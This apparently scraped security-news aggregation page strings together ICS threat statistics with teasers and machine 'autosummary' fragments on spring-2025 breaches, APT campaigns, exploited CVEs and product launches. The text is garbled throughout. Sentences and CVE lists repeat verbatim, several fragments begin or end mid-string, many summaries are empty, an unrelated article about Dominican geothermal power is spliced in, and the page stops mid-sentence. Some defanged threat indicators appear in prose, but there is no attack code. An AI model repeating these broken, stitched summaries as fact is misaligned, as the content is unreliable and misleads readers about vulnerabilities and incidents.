7.11% 7.16% ▲0.05 pp Denylisted internet resources 5.52% 5.12% ▼0.40 pp Spy Trojans, backdoors and keyloggers 4.30% 4.20% ▼0.10 pp Malicious documents (MSOffice + PDF) 1.71% 1.85% ▲0.14 pp Viruses 1.61% 1.53% ▼0.08 pp Worms 1.37% 1.31% ▼0.06 pp Miners in the form of executable files for Windows 0.70% 0.78% ▲0.08 pp Web miners running in browsers 0.39% 0.53% ▲0.14 pp Malware for AutoCAD 0.38% 0.34% ▼0.04 pp Ransomware 0.21% 0.16% ▼0.05 pp Main threat sources Internet 9.98% 10.11% ▲0.13 pp Email clients 2.72% 2.81% ▲0.09 pp Removable media 0.64% 0.52% ▼0.12 pp Network folders 0.08% 0.07% ▼0.01 pp Trends Relative stability from quarter to quarter. Percentage of ICS computers on which threats from network folders were blocked, Q1 2022–Q1 2025 Percentage of ICS computers on which threats from network folders were blocked, Q1 2023–Q1 2025 The top three regions by percentage of ICS computers on which threats from network folders were blocked were East Asia, South-East Asia, and South Asia.This group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers Building automation servers Data storage (Historian) servers Data gateways (OPC) Stationary workstations of engineers and operators Mobile workstations of engineers and operators Human machine interface (HMI) Computers used to manage technological and building automation networks Computers of ICS/PLC programmers Computers that share statistics with us belong to organizations from various industries. Percentage of ICS computers on which the activity of malicious objects from various categories was blocked Changes in percentage of ICS computers on which malicious objects from different categories were blocked, Q1 2025 The largest proportional increase in Q1 2025 was in the percentage of ICS computers on which web miners (1.4 times more than in the previous quarter) and malicious documents (1.1 times more) were blocked. Changes in percentage of ICS computers on which malicious scripts and phishing pages were blocked, Q1 2025 Next-stage malware Malicious objects used to initially infect computers deliver next-stage malware – spyware, ransomware, and miners – to victims’ computers. Percentage of ICS computers on which malicious scripts and phishing pages were blocked, Jan 2023–Mar 2025 The top three regions by percentage of ICS computers on which malicious scripts and phishing pages were blocked were Southern Europe, Africa, and the Middle East. Changes in percentage of ICS computers on which miners in the form of executable files for Windows were blocked, Q1 2025 Web miners In Q1 2025, the percentage of ICS computers on which web miners were blocked increased, reaching its highest level since Q3 2023. Percentage of ICS computers on which miners in the form of executable files for Windows were blocked, Jan 2023–Mar 2025 Central Asia, Russia, and Eastern Europe were the top three regions by percentage of ICS computers on which miners in the form of executable files for Windows were blocked. Percentage of ICS computers on which threats from removable media were blocked, Q1 2022–Q1 2025 The main categories of threats that are blocked when removable media is connected to ICS computers are worms, viruses, and spyware. Percentage of ICS computers on which threats from the internet were blocked, Q1 2022–Q1 2025 The main categories of threats from the internet blocked on ICS computers are denylisted internet resources, malicious scripts and phishing pages, and web miners. Percentage of ICS computers on which threats from email clients were blocked, Q1 2022–Q1 2025 The main categories of threats from email clients blocked on ICS computers are malicious documents, spyware, malicious scripts and phishing pages. Regions ranked by percentage of ICS computers on which threats from email clients were blocked, Q1 2025 Removable media In Q1 2025, the percentage of ICS computers on which threats from removable media were blocked continued to decrease and reached its lowest level since the beginning of 2023. Regions ranked by percentage of ICS computers on which threats from removable media were blocked, Q1 2025 Network folders In Q1 2025, the percentage of ICS computers on which threats from network folders were blocked reached its lowest level since early 2022. "Autosummary:
Masked Social Security (last four digits only); Masked bank-account numbers and some bank account identifiers; Government‑ID images (e.g., driver"s license, passport); Account data (balance snapshots and transaction history); and Limited corporate data (including documents, training material, and communications available to support agents). "Companies running Samsung MagicINFO, a platform for managing content on Samsung commercial digital displays, should upgrade to the latest available version of its v9 branch to fix a vulnerability that’s reportedly being exploited by attackers. If this advice sounds familiar, it’s because it is a repeat of a call that happened ten days ago, when researchers spotted attackers attempting to compromise machines running the platform’s server component by exploiting a path traversal vulnerability. At the … More
The post Samsung patches MagicINFO 9 Server vulnerability exploited by attackers appeared first on Help Net Security.
"Autosummary:
At the time, the researchers believed that the vulnerability in question was CVE-2024-7399 (ostensibly fixed in August 2024), since a proof-of-concept exploit for such a vulnerability was published on April 30, 2025. "Autosummary:
Follow the 3-2-1 (and then some!) backup rule The 3-2-1 backup rule has long been the gold standard: keep three copies of your data, store them on two different media and keep one copy off-site. No organization is immune to ransomware, and building a strong recovery strategy is equally, if not even more, important than attempting to prevent all attacks in the first place. Review regularly for: Security-related events like failed logins, privilege escalations, deletion of backups and device removal.According to Microsoft Digital Defense Report 2024, threat actors are trying to access user credentials through various methods, such as phishing, malware and brute-force/password spray attacks.Innovations like Ransomware-as-a-Service (RaaS) are lowering the bar for entry, making ransomware attacks more frequent and far-reaching than ever before. Protect your backup infrastructure from ransomware and internal threats Your backup infrastructure must be isolated, hardened and tightly controlled to prevent unauthorized access or tampering. "Autosummary:
It has been attributed with medium confidence to the Russian state-sponsored hacking group tracked as APT28, which is also referred to as BlueDelta, Fancy Bear, Fighting Ursa, Forest Blizzard, FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422.A Russia-linked threat actor has been attributed to a cyber espionage operation targeting webmail servers such as Roundcube, Horde, MDaemon, and Zimbra via cross-site scripting (XSS) vulnerabilities, including a then-zero-day in MDaemon, according to new findings from ESET. "Autosummary:
"Autosummary:
"Autosummary:
oniux torsocks Standalone application Requires running Tor daemon Uses Linux namespaces Uses an ld.so preload hack Works on all applications Only works on applications making system calls through libc Malicious application cannot leak Malicious application can leak by making a system call through raw assembly Linux only Cross-platform New and experimental Battle-proven for over 15 years Uses Arti as its engine Uses CTor as its engine Written in Rust Written in C Despite the obvious advantages of Oniux, Tor highlights that the project is still experimental and hasn"t been tested extensively under multiple conditions and scenarios. "Cryptocurrency exchange platform Coinbase has suffered a breach, which resulted in attackers acquiring customers’ data that can help them mount social engineering attacks, the company confirmed today by filing a report with the US Securities and Exchange Commission (SEC). The attack did not involve the compromise of company systems or networks. Instead, the data was accessed by a group of malicious support agents. How did the attack happen? According to the US-based company, criminals bribed … More
The post Coinbase suffers data breach, gets extorted (but won’t pay) appeared first on Help Net Security.
"Autosummary:
The rogue agents got their hands on customers’ name, address, phone number, emails address, the last 4 digitls of their Social Security number, masked bank account numbers and some bank account identifiers, images of government-issued IDs, and some account data (transaction history, snapshots of customers’ Coinbase account balance). "Autosummary:
Credential stealer function Source: ESET Additionally, it reads the DOM or sends HTTP requests to collect email message content, contacts, webmail settings, login history, two-factor authentication, and passwords. Notable targets include governments in Greece, Ukraine, Serbia, and Cameroon, military units in Ukraine and Ecuador, defense companies in Ukraine, Bulgaria, and Romania, and critical infrastructure in Ukraine and Bulgaria. "Autosummary:
“ The impacted personal information varies by customer and could include different types depending on what each customer provided, including name, phone number, email address, mailing and service addresses, Nova Scotia Power program participation information, date of birth, and customer account history (such as power consumption, service requests, customer payment, billing, and credit history, and customer correspondence), driver’s license number, and Social Insurance Number. "Autosummary:
Compromised data includes: Name, address, phone, and email; Masked Social Security (last 4 digits only); Masked bank-account numbers and some bank account identifiers; Government‑ID images (e.g., driver’s license, passport); Account data (balance snapshots and transaction history); and Limited corporate data (including documents, training material, and communications available to support agents). "In this Help Net Security interview, Carrie Mills, VP and CISO, Southwest Airlines talks about the cybersecurity challenges facing the aviation industry. She explains how being part of critical infrastructure, a major consumer brand, and an airline each brings its own set of security issues. What are the most pressing cyber threats currently facing the aviation industry? Southwest is not only an airline but also a well-known consumer brand and part of a United States … More
The post Southwest Airlines CISO on tackling cyber risks in the aviation industry appeared first on Help Net Security.
"Autosummary:
While not aviation-specific, Southwest leverages the National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF), which provides a risk-based approach integral to mitigating cybersecurity risks and impacts on our facilities, airports, and aircraft. How effective are current regulations and cybersecurity standards (e.g., ICAO, EASA, FAA, IATA) in mitigating cyber risks in aviation? "The European Union Agency for Cybersecurity (ENISA) has unveiled the European Vulnerability Database (EUVD), an initiative under the NIS2 Directive aimed at enhancing digital security across the EU. The database serves as a centralized repository offering aggregated and actionable information on cybersecurity vulnerabilities affecting ICT products and services. European Vulnerability Database: Features and accessibility The EUVD is designed to ensure a high level of interconnection of publicly available information from multiple sources, including Computer Security … More
The post European Vulnerability Database goes live, but who benefits? appeared first on Help Net Security.
"Autosummary:
The database is accessible to the public, including suppliers of network and information systems, entities using their services, competent national authorities, private companies, and researchers.It makes sense not only from a sovereignty perspective for the EU, I also think it’s a smart move to reduce reliance on a single system whose future funding and viability isn’t clear,” Joe Nicastro, Field CTO, Legit Security, told Help Net Security. "The fall of two of the most dominant ransomware syndicates, LockBit and AlphV, triggered a power vacuum across the cybercriminal landscape, acccording to a Black Kite survey. In their place, dozens of new actors emerged, many of them lacking the infrastructure, discipline, or credibility of their predecessors. The result was a surge in attack volume, a decline in coordination, and growing unpredictability in how, where, and why attacks occur. Ransomware landscape shift The number of … More
The post Ransomware spreads faster, not smarter appeared first on Help Net Security.
"Autosummary:
For the second consecutive year, the top three most targeted industries were manufacturing (1,314 victims), professional, scientific, and technical services (1,040 victims), and healthcare and social assistance (434 victims). In their place, dozens of new actors emerged, many of them lacking the infrastructure, discipline, or credibility of their predecessors. "Autosummary:
"Autosummary:
"The Nobara Project has released a new version of its Linux distribution, bringing updated packages, performance improvements, and a few visual tweaks aimed at making life easier for users who want a system that works well out of the box. Nobara Linux 42 includes changes that will be especially useful for anyone who wants a preconfigured Fedora-based desktop with minimal setup. Nobara is a custom version of Fedora Linux that includes extra drivers, packages, and … More
The post Nobara Linux 42 brings performance boost and better hardware support appeared first on Help Net Security.
"Autosummary:
For people who want a ready-to-use desktop for gaming, media work, or daily tasks, that can mean a lot of extra setup.The Nobara Project has released a new version of its Linux distribution, bringing updated packages, performance improvements, and a few visual tweaks aimed at making life easier for users who want a system that works well out of the box. "Resilience launched Cyber Risk Calculator to provide organizations with a financial snapshot of their cyber risk. The AI-powered tool provides security and risk practitioners and C-Suite executives alike with a data-driven language to better understand and quantify their cyber risk. The Cyber Risk Calculator uses industry benchmarks to help stakeholders understand their risk exposure and potential financial losses due to cyber-related incidents. Existing strategies for understanding cyber risk, such as heat maps, focus on vague ratings … More
The post Resilience helps businesses understand their cyber risk in financial terms appeared first on Help Net Security.
"Autosummary:
Drawing from our unique bird’s-eye-view of the threat landscape, extensive underwriting capabilities, and proprietary Risk Operations Center, we built a tool that bridges this communication gap,” said Dr. Ann Irvine, Chief Data and Analytics Officer at Resilience. "Autosummary:
The five vulnerabilities that have come under active exploitation in the wild are listed below - CVE-2025-30397 (CVSS score: 7.5) - Scripting Engine Memory Corruption Vulnerability (CVSS score: 7.5) - Scripting Engine Memory Corruption Vulnerability CVE-2025-30400 (CVSS score: 7.8) - Microsoft Desktop Window Manager (DWM)Driver Elevation of Privilege Vulnerability CVE-2025-32706 (CVSS score: 7.8) - Windows Common Log File System Driver Elevation of Privilege Vulnerability (CVSS score: 7.8) - Windows Common Log File System Driver Elevation of Privilege Vulnerability CVE-2025-32709 (CVSS score: 7.8) - Windows "Autosummary:
“To verify if fcgi debugging is enabled on your system, use the following CLI command: diag debug application fcgi If the output shows “general to-file ENABLED”, it means fcgi debugging is enabled on your system: fcgi debug level is 0x80041 general to-file ENABLED This is not a default setting, so unless you have enabled it in the past, this is potentially an Indicator of Compromise” continues the advisory. "Autosummary:
According to screenshots of the notices shared online, the incident was discovered on May 7, involving unauthorized personnel access, and exposed the following information: Full name Gender Phone number Email address Postal address Purchase history Notice sent to China customers Source: marketing-interactive.com The notice posted on Dior’s Korean shop also sets the breach date to May 7, 2025, suggesting a common cybersecurity incident that had an international impact. "McAfee is introducing McAfee’s Scam Detector, a new feature that automatically identifies scams across text, email, and video. Available now in all core McAfee plans at no extra cost, it arrives at a critical moment: nearly 1 in 3 Americans say they have fallen victim to an online scam in the last 12 months. To meet this growing threat, McAfee is protecting customers with advanced, in-plan, AI-powered scam detection – and driving education and awareness … More
The post McAfee’s Scam Detector identifies scams across text, email, and video appeared first on Help Net Security.
"Autosummary:
On-demand scam check: Upload a message, screenshot, or link for speedy analysis and context Upload a message, screenshot, or link for speedy analysis and context Deepfake detection: Identifies AI-generated videos with 96% accuracy in seconds Identifies AI-generated videos with 96% accuracy in seconds Built for modern communication: Works across apps, browsers, and devices, including iMessage, WhatsApp, Messenger, Gmail, and more Designed with a mobile-first approach, McAfee’s Scam Detector meets people where scams happen most. "Autosummary:
"The malware then proceeds to steal browser-related data from a range of targeted web browsers, including Brave, Yandex, Epic Privacy Browser, Comodo Dragon, Cent Browser, Opera, Microsoft Edge, and Google Chrome," Lin said. "Autosummary:
Driver Elevation of Privilege Vulnerability CVE-2025-32706 (CVSS score: 7.8) – Windows Common Log File System Driver Elevation of Privilege Vulnerability (CVSS score: 7.8) – Windows Common Log File System Driver Elevation of Privilege Vulnerability CVE-2025-32709 (CVSS score: 7.8) – "Autosummary:
"Autosummary:
"Persistence backdoor access to these systems provides a foothold for China-aligned APTs, potentially enabling strategic objectives of the People’s Republic of China (PRC), including military, intelligence, or economic advantage," Forescout said. "Autosummary:
"Autosummary:
"Autosummary:
To defend against this type of advanced, targeted phishing: Ensure your security stack can detect and block phishing pages even on trusted domains Invest in tools that recognize the impersonation of legitimate business platforms your organization uses (e.g., Microsoft 365, Okta, Google Workspace) Ensure your employees have real-time, browser-level protection, not just email filtering Keeping Up With Ever-Evolving Attacks Phishing continues to evolve—leveraging legitimate infrastructure, precision email validation, and evasive delivery techniques. Precision-Validated Phishing, Server-Side This technique, in which an attacker validates an email address in real-time to ensure only the intended targets or targets of higher value receive the final phishing page, is referred to as “Precision-Validated Phishing”. This pre-population technique implies the phishing emails include target-specific links, such as: compromised.domain.com/file/path?#victim_email@example.com Similar techniques have been seen before, like in a recent write-up, where a malicious SVG attached in a phishing email used JavaScript to append the victim’s email to a malicious URL and redirect the browser. This attack illustrates the abuse of trusted domains, the practice of server-side phishing email validation, and the critical need for browser-based, zero-day phishing protection. "Autosummary:
Xinbi Guarantee, per Elliptic, has 233,000 users, with merchants broken down to broad categories related to money laundering, Starlink satellite internet equipment, fake IDs, and databases of stolen personal information used to target potential victims. "Autosummary:
Cybercriminals cleverly hosted fake pages leveraging trusted cloud platforms like GitHub, Firebase, and Vercel, making it harder to spot the scams. "Autosummary:
"Autosummary:
" ReliaQuest said it also observed the deployment of a plugin-based trojan dubbed PipeMagic, which was most recently used in connection with the zero-day exploitation of a privilege escalation bug (CVE-2025-29824) in the Windows Common Log File System (CLFS) in limited attacks targeting entities in the U.S., Venezuela, Spain, and Saudi Arabia. "Autosummary:
Driver Elevation of Privilege Vulnerability CVE-2025-32706 (CVSS score: 7.8) – Windows Common Log File System Driver Elevation of Privilege Vulnerability (CVSS score: 7.8) – Windows Common Log File System Driver Elevation of Privilege Vulnerability CVE-2025-32709 (CVSS score: 7.8) –Scripting Engine Memory Corruption Vulnerability CVE-2025-30400 (CVSS score: 7.8) – Microsoft Desktop Window Manager (DWM) Core Library Elevation of Privilege Vulnerability (CVSS score: 7.8) – Microsoft Desktop Window Manager (DWM) "Autosummary:
a:ivanti:endpoint_manager_mobile:11.12.0.3:*:*:*:*:*:*:* cpe:2.3:a:ivanti:endpoint_manager_mobile:12.3.0.0:*:*:*:*:*:*:* 11.12.0.5 12.3.0.2 12.4.0.2 12.5.0.1 Download Portal: https://forums.ivanti.com/s/product-downloads The vulnerabilities have been addressed with versions 11.12.0.5, 12.3.0.2, 12.4.0.2, or 12.5.0.1. "Autosummary:
Hosts: Graham Cluley: @grahamcluley.com @[email protected] Carole Theriault: @caroletheriault Episode links: Sponsored by: Drata – The world’s most advanced Trust Management platform – making risk and compliance management accessible, continuous, and 10x more automated than ever before. "Autosummary:
"Autosummary:
Share Save Gemma Handy Business reporter Reporting from St John’s, Antigua Share Save Ormat The new geothermal power plant will access steam from boiling hot, natural underground reservoirs With rainforests, waterfalls, volcanoes and hot springs, the Caribbean island of Dominica"s dramatic landscape is a haven for adventure-seeking ecotourists."Ormat is doing the entire project, from making the plant"s elements, shipping them to Dominica, mainly from Israel, and then constructing the power plant." "All organizations erect silos – silos between groups and departments, across functions and among technologies. Silos represent differences in practices, culture and operations. Their presence inhibits communication and collaboration. As companies scale from startup to mid-sized and beyond, silos multiply and ossify. As operations expand from one site to many, from on-premises to cloud, from legacy to emerging tech (e.g., cloud and AI), silos don’t topple; they persist and proliferate. Nowhere are silos more evident … More
The post Breaking down silos in cybersecurity appeared first on Help Net Security.
"Autosummary:
Practitioners continue to acquire and juggle tool sets directed at endpoints, applications, network security, vulnerability management, cloud security, threat hunting and myriad other domains. Additionally, significant time and effort are spent identifying who is responsible for specific tasks, which could be the security team, product team, DevOps or even business units.As operations expand from one site to many, from on-premises to cloud, from legacy to emerging tech (e.g., cloud and AI), silos don’t topple; they persist and proliferate. "Resilient Cybersecurity touches on nearly every major function of enterprise cybersecurity, from threat detection and identity management to vendor risk and regulatory compliance. About the author Mark Dunkerley is a cybersecurity and technology leader with over 20 years of experience working in higher education, healthcare and Fortune 100 companies. Inside the book The structure of the book mirrors the process of building a cybersecurity program from the ground up. Early chapters focus on understanding the … More
The post Review: Resilient Cybersecurity appeared first on Help Net Security.
"Autosummary:
From there, he devotes individual chapters to each major program component, including vulnerability management, architecture, operations, awareness and training, and proactive services. "The post Cybersecurity jobs available right now: May 13, 2025 appeared first on Help Net Security.
"Autosummary:
Computer Network Defense Analyst RealmOne | USA | On-site – View job details As a Computer Network Defense Analyst, you will utilize information from various sources, such as intrusion detection systems, firewalls, network traffic logs, and host system logs, to identify potential vulnerabilities, respond to cyber events, and defend against possible threats. IT Specialist III – Lead Security Analyst City of Irvine | USA | On-site – View job details As an IT Specialist III – Lead Security Analyst, you will lead the monitoring, detection, investigation, and response to security incidents using SIEM, EDR, and threat intelligence platforms. Lead Security Consultant – Offensive Security Cyderes | Canada | Remote – View job details As a Lead Security Consultant – Offensive Security, you will lead and execute advanced penetration tests across internal/external networks, web/mobile apps, APIs, cloud, and wireless environments. Network Security Specialist – L2 Global Relay | United Kingdom | Hybrid – View job details As a Network Security Specialist – L2, you will be responsible for assisting in engineering, long term strategies, planning, integration, and deployments pertaining to the IT Network. Senior InfoSec Compliance Analyst Onit | India | On-site – View job details As a Senior InfoSec Compliance Analyst, you will lead the planning and execution of security audits, assess, implement, and maintain new compliance frameworks or controls, leading cross-functional projects for certifications or attestations. "For a while now, AI has played a part in cybersecurity. Now, agentic AI is taking center stage. Based on pre-programmed plans and objectives, agentic AI can make choices which optimize results without a need for developer intervention. As agentic AI can be programmed for various tasks, AI agents are set to create a labor revolution, from manufacturing to customer service. However, this comes at a cost, as they can also be programmed to conduct … More
The post AI vs AI: How cybersecurity pros can use criminals’ tools against them appeared first on Help Net Security.
"Autosummary:
Weighing up the good and bad While cybersecurity experts acknowledge the dangers of agentic AI, there is plenty of room for the technology to be developed for good, as we can already see in AI-powered tools for cybersecurity and intelligence gathering. Eventually, AI agents will neutralize social engineering attacks by removing their human link, just like with Daisy, the sweet old AI timewaster. "Autosummary:
"Autosummary:
In the next phase, the threat actor uses "OMServerService.vbs" to invoke "OM.vbs" and "OMServerService.exe," the latter of which is a Golang backdoor that contacts a hard-coded domain ("api.wordinfos[.]com") for data exfiltration. "Autosummary:
"Autosummary:
Konni APT, also known as Opal Sleet, Osmium, TA406, and Vedalia, is a cyber espionage group that has a history of targeting entities in South Korea, the United States, and Russia." The LNK files are configured to launch a decoy HWP file and run PowerShell commands, leading to the execution of files named toy03.bat, toy02.bat, and toy01.bat (in that order), the last of which contains shellcode to launch RoKRAT, a staple malware associated with APT37. "Autosummary:
On May 6, 2025, the Moldovan law enforcement searched the suspect’s home and car, seizing key evidence linked to cybercrimes, including €84,800 in cash, an e-wallet, laptops, a phone, a tablet, six bank cards, and multiple storage devices. "Autosummary:
Since April 2024, the threat actor Marbled Dust (aka Sea Turtle, Teal Kurma, Marbled Dust, SILICON and Cosmic Wolf) has exploited a zero-day flaw (CVE-2025-27920) in Output Messenger to target Kurdish military-linked users in Iraq, collecting user data and deploying malicious files. "Autosummary:
"Autosummary:
"Autosummary:
But he was found to be in possession of materials designed to create fake payment cards, and a substantial amount of Bitcoin, Ethereum, Litecoin, Dogecoin, Monero, XLM, Dash, and Cardano cryptocurrency. Mazhar, of Douglas, Cork, has been jailed for two years after pleading guilty to offences related to his illegal online business that sold ransomware and other malware, as well as stolen credit card details, and false bank accounts. "Attackers have exploited vulnerabilities in open-source libraries to compromise on-prem Ivanti Endpoint Manager Mobile (EPMM) instances of a “very limited” number of customers, Ivanti has confirmed on Tuesday, and urged customers to install a patch as soon as possible. “The investigation is ongoing and Ivanti does not have reliable atomic indicators [of compromise] at this time. Customers should reach out to our Support Team for guidance,” the company said. CVE-2025-4427 and CVE-2025-4428 The exploited vulnerabilities … More
The post Ivanti EPMM vulnerabilities exploited in the wild (CVE-2025-4427, CVE-2025-4428) appeared first on Help Net Security.
"Autosummary:
They didn’t have a CVE number when Ivanti reported them to the maintainers of the open-source libraries, but they have now: CVE-2025-4427 is an authentication bypass flaw that allows attackers to access protected resources without proper credentials CVE-2025-4428 is a remote code execution vulnerability that allows attackers to execute arbitrary code on the target system The vulnerabilities have been flagged by CERT-EU, the cybersecurity service for the institutions, bodies, offices and agencies of the European Union, so it’s likely that they have been exploited as zero-days (i.e., vulnerabilities unknown to the libraries’ developers and without a patch) to breach some of those institutions. "Autosummary:
In addition, three different Chinese hacking groups have been observed exploiting the SAP NetWeaver vulnerability as part of efforts to maintain remote access, conduct reconnaissance, and drop malicious programs - CL-STA-0048, which has attempted to establish an interactive reverse shell to "43.247.135[.]53," an IP address previously identified as used by the threat actor UNC5221, which has leveraged a web shell to deploy KrustyLoader, a Rust-based malware that can used to serve second-stage payloads like Sliver, set up persistence, and execute shell commands UNC5174, which has leveraged a web shell to download SNOWLIGHT, a loader that initiates a connection with a hard-coded server to fetch a Go-based remote access trojan named VShell and a backdoor known as GOREVERSE "China-linked APTs are highly likely to continue targeting internet-exposed enterprise applications and edge devices to establish long-term strategic and persistence access to critical infrastructure networks globally," Büyükkaya said. "Autosummary:
"The attacks we observed during March 2025 (that started with basic proves back in January 2025) are actually abusing both, the lack of authentication (CVE-2025-31324) as well as the insecure de-serialization (CVE-2025-42999)," Perez-Etchegoyen told BleepingComputer. "Autosummary:
Ivanti EPMM instances exposed online (Shadowserver) Today, Ivanti also released security updates to address a critical authentication bypass vulnerability (CVE-2025-22462) impacting its Neurons for ITSM IT service management solution that can let unauthenticated attackers gain administrative access. "Autosummary:
The number of bugs in each vulnerability category is listed below: 17 Elevation of Privilege Vulnerabilities 2 Security Feature Bypass Vulnerabilities 28 Remote Code Execution Vulnerabilities 15 Information Disclosure Vulnerabilities 7 Denial of Service Vulnerabilities 2 Spoofing Vulnerabilities This count does not include Azure, Dataverse, Mariner, and Microsoft Edge flaws that were fixed earlier this month. The actively exploited zero-day vulnerability in today"s updates is: CVE-2025-30400 - Microsoft DWM Core Library Elevation of Privilege Vulnerability Microsoft fixed an exploited elevation of privileges vulnerability that gives attackers SYSTEM privileges. "On May 2025 Patch Tuesday, Microsoft has released security fixes for 70+ vulnerabilities, among them five actively exploited zero-days and two publicly disclosed (but not exploited) vulnerabilities. The zero-days and the publicly disclosed flaws Among the zero-days patched is a memory corruption vulnerability in the Windows scripting engine (CVE-2025-30397) that is being exploited to remotely execute malicious code. “The user would have to click on a specially crafted URL to be compromised by the attacker,” … More
The post Patch Tuesday: Microsoft fixes 5 actively exploited zero-days appeared first on Help Net Security.
"Autosummary:
“SharePoint services, especially those used as internal document stores, can be a treasure trove for threat actors looking to steal data, especially data that may be leveraged to force ransom payments using double extortion techniques by threatening to release the stolen data if payment is not made,” said Kev Breen, Senior Director Threat Research at Immersive. "Fortinet has patched a critical vulnerability (CVE-2025-32756) that has been exploited in the wild to compromise FortiVoice phone / conferencing systems, the company’s product security incident response team has revealed on Tuesday. About CVE-2025-32756 CVE-2025-32756 is a stack-based overflow vulnerability that can lead to remote code and command execution by unauthenticated attackers. To trigger it, they only need to send a specially crafted HTTP request to a specific API. According to the Fortinet PSIRT, the … More
The post Zero-day exploited to compromise Fortinet FortiVoice systems (CVE-2025-32756) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
“The personal data taken could include contact details – such as name, email address, addresses, telephone number – date of birth, online order history, household information and ‘masked’ payment card details used for online purchases. The stolen M&S data may include contact info, birthdate, order history, household data, and masked card details, but not full payment info. "In this Help Net Security video, Chase Doelling, Principal Strategist at JumpCloud, discusses the overlooked security risks associated with improper offboarding. Though many organizations focus on securely onboarding new employees, they often overlook the security risks associated with properly offboarding workers, especially when offboarding happens in mass and unexpectedly. The process of offboarding can be complex and urgent, often requiring IT teams to act quickly to deactivate access. However, many security teams are already stretched … More
The post Layoffs pose a cybersecurity risk: Here’s why offboarding matters appeared first on Help Net Security.
"Autosummary:
"Most people think great presenters are born with natural talent. Luka Krejci, a presentation expert, disagrees. “They are called presentation skills. Skills, not talent,” he says. “Any skill, be it dancing, football, or presenting, can be developed only if you commit and practice.” So, the first step is obvious: Quit avoiding presentations. The more you do them, the better you’ll get. Content first, delivery second We tend to focus on the performance side of presenting: … More
The post How to give better cybersecurity presentations (without sounding like a robot) appeared first on Help Net Security.
"Autosummary:
“Even super technical people enjoy everyday language, stories, examples, metaphors, or even humor,” he says.“Any skill, be it dancing, football, or presenting, can be developed only if you commit and practice.” “We usually start our presentations by introducing ourselves, the topic, and the agenda,” Krejci notes. Content first, delivery second We tend to focus on the performance side of presenting: body language, tone, gestures. "Autosummary:
" Once unsuspecting users upload their image or video prompts on these sites, they are then asked to download the supposed AI-generated content, at which point a malicious ZIP archive ("VideoDreamAI.zip") is downloaded instead. "Resecurity launched Resecurity One, the next-generation cybersecurity platform designed to improve how organizations approach cybersecurity. Resecurity One combines Digital Risk Management, Cyber Threat Intelligence, Endpoint Protection, Identity Protection, Supply Chain Risk Monitoring, and xDR capabilities into a unified solution, providing comprehensive protection against evolving cyber threats. Resecurity One is a breakthrough in cybersecurity technology that addresses the challenges faced by organizations of all sizes in managing multiple cybersecurity products. By integrating various cybersecurity functionalities into … More
The post Resecurity One simplifies cybersecurity operations appeared first on Help Net Security.
"Autosummary:
Resecurity One combines Digital Risk Management, Cyber Threat Intelligence, Endpoint Protection, Identity Protection, Supply Chain Risk Monitoring, and xDR capabilities into a unified solution, providing comprehensive protection against evolving cyber threats. Benefits of Resecurity One platform Resecurity One, as a Platform as a Service (PaaS), brings several key advantages to organizations: Reduced fragmentation: By integrating multiple cybersecurity functions into a single platform, Resecurity One eliminates the need for disparate security tools, thereby reducing complexity and enhancing operational efficiency. "Autosummary:
This week"s list includes — CVE-2025-32819, CVE-2025-32820, CVE-2025-32821 (SonicWall), CVE-2025-20188 (Cisco IOS XE Wireless Controller), CVE-2025-27007 (OttoKit), CVE-2025-24977 (OpenCTI), CVE-2025-4372 (Google Chrome), CVE-2025-25014 (Elastic Kibana), CVE-2025-4318 (AWS Amplify Studio), CVE-2024-56523, CVE-2024-56524 (Radware Cloud Web Application Firewall), CVE-2025-27533 (Apache ActiveMQ), CVE-2025-26168, CVE-2025-26169 (IXON VPN), CVE-2025-23123 (Ubiquiti UniFi Protect Cameras), CVE-2024-8176 (libexpat), and CVE-2025-47188 (Mitel 6800 Series, 6900 Series, and 6900w Series SIP Phones).With support for cloud services (S3, GCS, Firebase), databases (MySQL, PostgreSQL, MongoDB, Redis), messaging apps (Slack), and local file systems, it uses advanced OCR and pattern-matching to uncover sensitive data hidden in documents, images, archives, and even videos.With support for cloud services (S3, GCS, Firebase), databases (MySQL, PostgreSQL, MongoDB, Redis), messaging apps (Slack), and local file systems, it uses advanced OCR and pattern-matching to uncover sensitive data hidden in documents, images, archives, and even videos."Despite vendor customizations in USB stacks, ChoiceJacking attacks gain access to sensitive user files (pictures, documents, app data) on all tested devices from 8 vendors including the top 6 by market share," researchers Florian Draschbacher, Lukas Maar, Mathias Oberhuber, and Stefan Mangard said."Despite vendor customizations in USB stacks, ChoiceJacking attacks gain access to sensitive user files (pictures, documents, app data) on all tested devices from 8 vendors including the top 6 by market share," researchers Florian Draschbacher, Lukas Maar, Mathias Oberhuber, and Stefan Mangard said.The attacks, detected in January, March, and April 2025, targeted current and former advisors to Western governments and militaries, as well as journalists, think tanks, and NGOs, as well as individuals connected to Ukraine.The attacks, detected in January, March, and April 2025, targeted current and former advisors to Western governments and militaries, as well as journalists, think tanks, and NGOs, as well as individuals connected to Ukraine."Although these activities often include basic and elementary intrusion techniques, the presence of poor cyber hygiene and exposed assets can escalate these threats, leading to significant consequences such as defacement, configuration changes, operational disruptions and, in severe cases, physical damage," the agencies said."Although these activities often include basic and elementary intrusion techniques, the presence of poor cyber hygiene and exposed assets can escalate these threats, leading to significant consequences such as defacement, configuration changes, operational disruptions and, in severe cases, physical damage," the agencies said.Built for speed and simplicity, it allows investigators to quickly search through Windows Event Logs, MFT files, Shimcache, SRUM, and registry hives using keyword matching, regex, and Sigma detection rules.Built for speed and simplicity, it allows investigators to quickly search through Windows Event Logs, MFT files, Shimcache, SRUM, and registry hives using keyword matching, regex, and Sigma detection rules."By targeting browsers, authentication tokens, and system files, it enables cybercriminals to perform identity theft, corporate espionage, and unauthorized financial transactions," Flashpoint said."By targeting browsers, authentication tokens, and system files, it enables cybercriminals to perform identity theft, corporate espionage, and unauthorized financial transactions," Flashpoint said.The flaws, tracked as CVE-2025-2775, CVE-2025-2776, CVE-2025-2777 (CVSS scores: 9.3), and CVE-2025-2778, have been addressed in version 24.4.60 b16 of the software.The flaws, tracked as CVE-2025-2775, CVE-2025-2776, CVE-2025-2777 (CVSS scores: 9.3), and CVE-2025-2778, have been addressed in version 24.4.60 b16 of the software. — The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Environmental Protection Agency (EPA), and Department of Energy (DOE) are urging critical infrastructure entities to review and take steps to bolster their security posture amid "cyber incidents affecting the operational technology (OT) and industrial 